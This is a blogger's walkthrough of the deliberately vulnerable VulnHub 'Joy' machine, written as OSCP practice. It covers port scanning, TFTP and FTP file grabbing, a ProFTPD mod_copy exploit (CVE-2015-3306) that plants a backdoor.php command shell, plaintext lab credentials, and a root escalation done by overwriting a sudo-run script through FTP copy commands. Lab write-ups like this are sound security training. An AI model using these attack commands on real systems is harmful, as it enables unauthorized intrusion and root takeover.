Digitalworld Joy VulnHub Walkthrough
Note: this post was originally posted on another blog I had in June 2020, and I worked through this VulnHub machine to fix my enumeration and note-taking abilities after failing the OSCP exam the second time.
Digitalworld.local Joy https://www.vulnhub.com/entry/digitalworldlocal-joy,298/
This machine would have been much more complicated if not for enumeration. Most of the work was getting the initial shell, and after that, the box fell quickly.
I learned that if I find a vulnerability with a public exploit, calm down, take note of it, and keep enumerating because there could be more exploits (more reliable/easy). For example, I wasted a lot more time on dropbear ssh exploit than I should have.
Flow
- Enumerate ports and versions
- Download all FTP content
- Waste time trying to exploit dropbear ssh
- Proftpd allows CPFR and CPTO, but exploit needs the web directory (it isn’t default)
- Download patrick’s files via TFTP, discovered by SNMP (also possible to download via with the CPFR and CPTO trick, will show both)
- Discover web directory from patrick’s files and use proftpd exploit to get a web RCE
- Get a reverse shell via RCE
- Find patrick’s password and su to patrick
- Replace sudo script with CPFR/CPTO trick and get a root shell
- Get flag
Initial Enumeration
Nmap – TCP Ports
nmap -sC -sV -p- -oA nmap/nmap_tcp 10.88.42.136
# Nmap 7.80 scan initiated Tue Jun 16 07:54:40 2020 as: nmap -sC -sV -p- -oA nmap/nmap_tcp 10.88.42.136 Nmap scan report for 10.88.42.136 Host is up (0.00046s latency). Not shown: 65523 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp ProFTPD 1.2.10 | ftp-anon: Anonymous FTP login allowed (FTP code 230) | drwxrwxr-x 2 ftp ftp 4096 Jan 6 2019 download |_drwxrwxr-x 2 ftp ftp 4096 Jan 10 2019 upload 22/tcp open ssh Dropbear sshd 0.34 (protocol 2.0) 25/tcp open smtp Postfix smtpd |_smtp-commands: JOY.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, | ssl-cert: Subject: commonName=JOY | Subject Alternative Name: DNS:JOY | Not valid before: 2018-12-23T14:29:24 |_Not valid after: 2028-12-20T14:29:24 |_ssl-date: TLS randomness does not represent time 80/tcp open http Apache httpd 2.4.25 | http-ls: Volume / | SIZE TIME FILENAME | - 2016-07-19 20:03 ossec/ |_ |_http-server-header: Apache/2.4.25 (Debian) |_http-title: Index of / 110/tcp open pop3 Dovecot pop3d |_pop3-capabilities: PIPELINING SASL TOP CAPA STLS AUTH-RESP-CODE UIDL RESP-CODES |_ssl-date: TLS randomness does not represent time 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 143/tcp open imap Dovecot imapd |_imap-capabilities: OK LITERAL+ IMAP4rev1 have ENABLE ID more IDLE post-login listed SASL-IR capabilities Pre-login STARTTLS LOGINDISABLEDA0001 LOGIN-REFERRALS |_ssl-date: TLS randomness does not represent time 445/tcp open netbios-ssn Samba smbd 4.5.16-Debian (workgroup: WORKGROUP) 465/tcp open smtp Postfix smtpd |_smtp-commands: JOY.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, | ssl-cert: Subject: commonName=JOY | Subject Alternative Name: DNS:JOY | Not valid before: 2018-12-23T14:29:24 |_Not valid after: 2028-12-20T14:29:24 |_ssl-date: TLS randomness does not represent time 587/tcp open smtp Postfix smtpd |_smtp-commands: JOY.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, | ssl-cert: Subject: commonName=JOY | Subject Alternative Name: DNS:JOY | Not valid before: 2018-12-23T14:29:24 |_Not valid after: 2028-12-20T14:29:24 |_ssl-date: TLS randomness does not represent time 993/tcp open ssl/imaps? |_ssl-date: TLS randomness does not represent time 995/tcp open ssl/pop3s? |_ssl-date: TLS randomness does not represent time MAC Address: 00:0C:29:32:A4:6A (VMware) Service Info: Hosts: The, JOY.localdomain, 127.0.1.1, JOY; OS: Linux; CPE: cpe:/o:linux:linux_kernel Host script results: |_clock-skew: mean: -2h40m00s, deviation: 4h37m07s, median: 0s |_nbstat: NetBIOS name: JOY, NetBIOS user: , NetBIOS MAC: (unknown) | smb-os-discovery: | OS: Windows 6.1 (Samba 4.5.16-Debian) | Computer name: joy | NetBIOS computer name: JOY\x00 | Domain name: \x00 | FQDN: joy |_ System time: 2020-06-16T19:54:56+08:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2020-06-16T11:54:56 |_ start_date: N/A Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Tue Jun 16 07:57:41 2020 -- 1 IP address (1 host up) scanned in 181.15 seconds
Nmap – UDP Ports
SNMP conveniently displays a process listing, netstat info, and installed packages. In addition, it shows TFTP service running on port 36969 that’s serving patrick’s home directory. I truncated the Nmap output a lot to show that.
nmap -sU -sC -sV -p 1-1000 -oA nmap/nmap_udp_1-1000 10.88.42.136
# Nmap 7.80 scan initiated Tue Jun 16 08:06:13 2020 as: nmap -sU -sC -sV -p 1-1000 -oA nmap/nmap_udp_1-1000 10.88.42.136 Nmap scan report for 10.88.42.136 Host is up (0.00069s latency). Not shown: 994 closed ports PORT STATE SERVICE VERSION 68/udp open|filtered dhcpc 123/udp open ntp NTP v4 (secondary server) | ntp-info: |_ 137/udp open netbios-ns Samba nmbd netbios-ns (workgroup: WORKGROUP) 138/udp open|filtered netbios-dgm 161/udp open snmp SNMPv1 server; net-snmp SNMPv3 server (public) | snmp-info: | enterprise: net-snmp | engineIDFormat: unknown | engineIDData: d1785e76ec962f5c00000000 | snmpEngineBoots: 29 |_ snmpEngineTime: 44m11s | snmp-interfaces: | lo | IP address: 127.0.0.1 Netmask: 255.0.0.0 | Type: softwareLoopback Speed: 10 Mbps | Traffic stats: 5.31 Kb sent, 5.31 Kb received | Intel Corporation 82545EM Gigabit Ethernet Controller (Copper) | IP address: 10.88.42.136 Netmask: 255.255.255.0 | MAC address: 00:0c:29:32:a4:6a (VMware) | Type: ethernetCsmacd Speed: 1 Gbps |_ Traffic stats: 89.38 Mb sent, 241.11 Mb received | snmp-netstat: | TCP 0.0.0.0:21 0.0.0.0:0 | TCP 0.0.0.0:22 0.0.0.0:0 | TCP 0.0.0.0:25 0.0.0.0:0 | TCP 0.0.0.0:110 0.0.0.0:0 | TCP 0.0.0.0:139 0.0.0.0:0 | TCP 0.0.0.0:143 0.0.0.0:0 | TCP 0.0.0.0:445 0.0.0.0:0 | TCP 0.0.0.0:465 0.0.0.0:0 | TCP 0.0.0.0:587 0.0.0.0:0 | TCP 0.0.0.0:993 0.0.0.0:0 | TCP 0.0.0.0:995 0.0.0.0:0 | TCP 127.0.0.1:631 0.0.0.0:0 | TCP 127.0.0.1:3306 0.0.0.0:0 | UDP 0.0.0.0:68 *:* | UDP 0.0.0.0:123 *:* | UDP 0.0.0.0:137 *:* | UDP 0.0.0.0:138 *:* | UDP 0.0.0.0:161 *:* | UDP 0.0.0.0:631 *:* | UDP 0.0.0.0:1900 *:* | UDP 0.0.0.0:5353 *:* | UDP 0.0.0.0:36969 *:* | UDP 0.0.0.0:42070 *:* | UDP 0.0.0.0:51704 *:* | UDP 10.88.42.136:123 *:* | UDP 10.88.42.136:137 *:* | UDP 10.88.42.136:138 *:* | UDP 10.88.42.255:137 *:* | UDP 10.88.42.255:138 *:* |_ UDP 127.0.0.1:123 *:* | snmp-processes: ... | 754: | Name: in.tftpd | Path: /usr/sbin/in.tftpd | Params: --listen --user tftp --address 0.0.0.0:36969 --secure /home/patrick ...
FTP – Anonymous FTP
Since anonymous FTP is active and there are files to grab, I decided to grab them all. I’m not sure what the best tool is, but I’ve always used the lftp client to mirror FTP contents.
mkdir ftp cd ftp lftp -u anonymous,anonymous -e 'mirror;quit' 10.88.42.136
FTP – FILES
. ./download ./upload ./upload/project_yolo ./upload/project_malindo ./upload/project_woranto ./upload/project_flamingo ./upload/project_bravado ./upload/project_luyano ./upload/project_komodo ./upload/project_desperado ./upload/reminder ./upload/project_okacho ./upload/directory ./upload/project_toto ./upload/project_sicko ./upload/project_zoo ./upload/project_vivino ./upload/project_armadillo ./upload/project_polento ./upload/project_indigo ./upload/project_uno ./upload/project_emilio ./upload/project_ronaldinho
FTP – upload/directory
More confirmation that patrick is a user on the system. It also seems like this is /home/patrick (previously mentioned in the process listing via SNMP).
Patrick's Directory total 128 drwxr-xr-x 18 patrick patrick 4096 Jun 16 20:10 . drwxr-xr-x 4 root root 4096 Jan 6 2019 .. -rw------- 1 patrick patrick 185 Jan 28 2019 .bash_history -rw-r--r-- 1 patrick patrick 220 Dec 23 2018 .bash_logout -rw-r--r-- 1 patrick patrick 3526 Dec 23 2018 .bashrc drwx------ 7 patrick patrick 4096 Jan 10 2019 .cache drwx------ 10 patrick patrick 4096 Dec 26 2018 .config drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Desktop drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Documents drwxr-xr-x 3 patrick patrick 4096 Jan 6 2019 Downloads drwx------ 3 patrick patrick 4096 Dec 26 2018 .gnupg -rwxrwxrwx 1 patrick patrick 0 Jan 9 2019 haha -rw-r--r-- 1 patrick patrick 0 Jun 16 19:50 HmjhT4RkfTh7RIMfqMJWMphRts7EwVJL.txt -rw-r--r-- 1 patrick patrick 0 Jun 16 19:45 IBrat9JjUMGHJtVsAUfc0CLW3LEP4M15.txt -rw------- 1 patrick patrick 8532 Jan 28 2019 .ICEauthority drwxr-xr-x 3 patrick patrick 4096 Dec 26 2018 .local drwx------ 5 patrick patrick 4096 Dec 28 2018 .mozilla drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Music drwxr-xr-x 2 patrick patrick 4096 Jan 8 2019 .nano -rw-r--r-- 1 patrick patrick 24 Jun 16 19:45 p2pIHflvQpgys7Io9W7E33H4uFmzwHJpPgViBOlLBHDxi0zqJcrZObfDqPBG6GQ5.txt drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Pictures -rw-r--r-- 1 patrick patrick 675 Dec 23 2018 .profile drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Public -rw-r--r-- 1 patrick patrick 24 Jun 16 20:05 qNdejbhnSVcWpNVgYQvrq52kACwqgDUiyvo8Q5JgTZ1dvHcHOGpzFuEqC387wCWx.txt -rw-r--r-- 1 patrick patrick 24 Jun 16 20:00 QrHTw7iuO4JCToijShVuQMrFcReSv9YV435E3niEYbFmoT50vikNjbsKuqgPGWot.txt d--------- 2 root root 4096 Jan 9 2019 script -rw-r--r-- 1 patrick patrick 24 Jun 16 19:50 sh5lebDMlsOns3I7sF7mnHqj5zbuJv9EMc60nGmmUbJOv6tJrDzSRsvJNeoiB0el.txt -rw-r--r-- 1 patrick patrick 0 Jun 16 20:05 soqjRoS2by1apdqTErDEQTspl2YuWgva.txt drwx------ 2 patrick patrick 4096 Dec 26 2018 .ssh -rw-r--r-- 1 patrick patrick 0 Jan 6 2019 Sun drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Templates -rw-r--r-- 1 patrick patrick 0 Jan 6 2019 .txt -rw-r--r-- 1 patrick patrick 0 Jun 16 20:10 U1wNlhsloNt2AHXJZPs9Xi0rIj0gmazP.txt -rw-r--r-- 1 patrick patrick 24 Jun 16 19:55 u42rsGynarnocbP6FwTiFmnwmLLiHcCQTitVqbHnYYX28K4t43oqp3vjXdSQdbeQ.txt -rw-r--r-- 1 patrick patrick 0 Jun 16 20:00 uxXpvjuUYMGKvOEDaCFfUFhTmvcvWcm0.txt -rw-r--r-- 1 patrick patrick 407 Jan 27 2019 version_control drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Videos -rw-r--r-- 1 patrick patrick 0 Jun 16 19:55 xXATmw8ZuarOVbYrxznrcKrPJdYRchUI.txt -rw-r--r-- 1 patrick patrick 24 Jun 16 20:10 ZxjEw0BVqBxx4KpJ4oDwRvOUbrRVYh8H50OIZyAE47jdGvuBFbIr25hTqvFg1cbL.txt You should know where the directory can be accessed. Information of this Machine! Linux JOY 4.9.0-8-amd64 #1 SMP Debian 4.9.130-2 (2018-10-27) x86_64 GNU/Linux
What I Did Before UDP Scan Finished
Dropbear SSH Exploit Attempt
I wasted too much time getting tunnel vision on trying to exploit dropbear ssh (there’s an old exploit I spent time trying to get to work). It ultimately wasn’t fruitful. There’s an entry in searchsploit for it (exploits/linux/remote/387.c).
ProFTPD Exploit Attempt
I spent time on a searchsploit provided exploit (exploits/linux/remote/36803.py), but it requires the web directory. I did learn about CPFR and CPTO commands. I should have tried to use them to get patrick’s files. I’ll show it after the TFTP method (likely the intended method).
What We Now Know
- patrick is a system user
- patrick’s home directory is /home/patrick
- we have a list of patrick’s files that are likely in /home/patrick
- TFTP is serving /home/patrick
TFTP – Getting Patrick’s Files
Now we need to grab each of patrick’s files from TFTP using the file list. Be sure to remove “.” and “..” from the list of files.
awk '/[0-9] /{print $9}' ftp/upload/directory > patrick_files.txt
# remove . and .. from patrick_files.txt
mkdir tftp
cd tftp
for file in `cat ../patrick_files.txt`; do echo -e "get $file\nquit\n"|tftp 10.88.42.136 36969; done
for i in *; do echo ">> $i <<" && cat $i; done
>> Desktop <<
>> Documents <<
>> Downloads <<
>> haha <<
>> HmjhT4RkfTh7RIMfqMJWMphRts7EwVJL.txt <<
>> IBrat9JjUMGHJtVsAUfc0CLW3LEP4M15.txt <<
>> Music <<
>> p2pIHflvQpgys7Io9W7E33H4uFmzwHJpPgViBOlLBHDxi0zqJcrZObfDqPBG6GQ5.txt <<
Patrick is hardworking!
>> Pictures <<
>> Public <<
>> qNdejbhnSVcWpNVgYQvrq52kACwqgDUiyvo8Q5JgTZ1dvHcHOGpzFuEqC387wCWx.txt <<
Patrick is hardworking!
>> QrHTw7iuO4JCToijShVuQMrFcReSv9YV435E3niEYbFmoT50vikNjbsKuqgPGWot.txt <<
Patrick is hardworking!
>> script <<
>> sh5lebDMlsOns3I7sF7mnHqj5zbuJv9EMc60nGmmUbJOv6tJrDzSRsvJNeoiB0el.txt <<
Patrick is hardworking!
>> soqjRoS2by1apdqTErDEQTspl2YuWgva.txt <<
>> Sun <<
>> Templates <<
>> U1wNlhsloNt2AHXJZPs9Xi0rIj0gmazP.txt <<
>> u42rsGynarnocbP6FwTiFmnwmLLiHcCQTitVqbHnYYX28K4t43oqp3vjXdSQdbeQ.txt <<
Patrick is hardworking!
>> uxXpvjuUYMGKvOEDaCFfUFhTmvcvWcm0.txt <<
>> version_control <<
Version Control of External-Facing Services:
Apache: 2.4.25
Dropbear SSH: 0.34
ProFTPd: 1.3.5
Samba: 4.5.12
We should switch to OpenSSH and upgrade ProFTPd.
Note that we have some other configurations in this machine.
1. The webroot is no longer /var/www/html. We have changed it to /var/www/tryingharderisjoy.
2. I am trying to perform some simple bash scripting tutorials. Let me see how it turns out.
>> Videos <<
>> x86_64 <<
>> xXATmw8ZuarOVbYrxznrcKrPJdYRchUI.txt <<
>> ZxjEw0BVqBxx4KpJ4oDwRvOUbrRVYh8H50OIZyAE47jdGvuBFbIr25hTqvFg1cbL.txt <<
Patrick is hardworking!FTP – Getting Patrick’s Files
We can use the CPFR and CPTO trick to put patrick’s files in the upload directory. Be sure to remove . and .. from the file list, or you could fill up the hard disk (yes, I did it). This takes some guesswork if you don’t know where the FTP directory is, but I guessed/knew it was /home/ftp.
for file in `cat patrick_files.txt`; do echo -e "site cpfr /home/patrick/$file\nsite cpto /home/ftp/upload/$file\nquit"|nc 10.88.42.136 21; done cd ftp && lftp -u anonymous,anonymous -e 'mirror;quit' 10.88.42.136; cd -
Exploiting ProFTPD
We now know the web directory is /var/www/tryingharderisjoy, which is the last piece of information we needed to try to exploit for proftpd.
I tried the exploit in searchsploit, but it didn’t work. So I went looking on the web and found https://github.com/t0kx/exploit-CVE-2015-3306/, which works!
[18:10:35]🔥root[ /home/kali/VulnHub/joy ]# python3 exploit.py usage: exploit.py [-h] --host HOST --port PORT --path PATH exploit.py: error: the following arguments are required: --host, --port, --path [18:10:40]🔴->2 root[ /home/kali/VulnHub/joy ]# python3 exploit.py --host 10.88.42.136 --port 21 --path /var/www/tryingharderisjoy [+] CVE-2015-3306 exploit by t0kx [+] Exploiting 10.88.42.136:21 [+] Target exploited, acessing shell at http://10.88.42.136/backdoor.php [+] Running whoami: www-data [+] Done [18:11:30]🔥root[ /home/kali/VulnHub/joy ]#
http://10.88.42.136/backdoor.php?cmd=COMMAND_HERE
“which nc” returns nothing, so netcat isn’t installed. So, I went back to http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet to see the reverse shell options again.
I tried the bash one, and it didn’t work. So I went to CyberChef to url encode the bash reverse shell.
I tried the PHP one (since I know PHP is installed), and it did work. I also went to CyberChef to url encode the PHP reverse shell.
Pivot to the Patrick User
Looking around, the ossec directory is there, so I looked inside of it. There’s a suspect file, “patricksecretsofjoy,” and it contains patrick’s password.
[email protected]:/var/www/tryingharderisjoy/ossec$ cat patricksecretsofjoy cat patricksecretsofjoy credentials for JOY: patrick:apollo098765 root:howtheheckdoiknowwhattherootpasswordis how would these hack3rs ever find such a page? [email protected]:/var/www/tryingharderisjoy/ossec$
patrick:apollo098765
I tried to ssh in, but that didn’t work.
[email protected]:~$ ssh [email protected] Unable to negotiate with 10.88.42.136 port 22: no matching key exchange method found. Their offer: diffie-hellman-group1-sha1
I could, fortunately, su to patrick.
Pivot to Root
There’s a sudo command that uses a custom command. Unfortunately, I couldn’t edit or read the file directly.
But I could replace its contents using the FTP CPFR/CPTO trick from earlier.
cd /dev/shm echo -e '#!/bin/sh\nsh\n'>test chmod +x test echo -e "site cpfr /dev/shm/test\nsite cpto /home/patrick/script/test\nquit"|nc 10.88.42.136 21
Then I ran the sudo command and got a root shell.
Flag
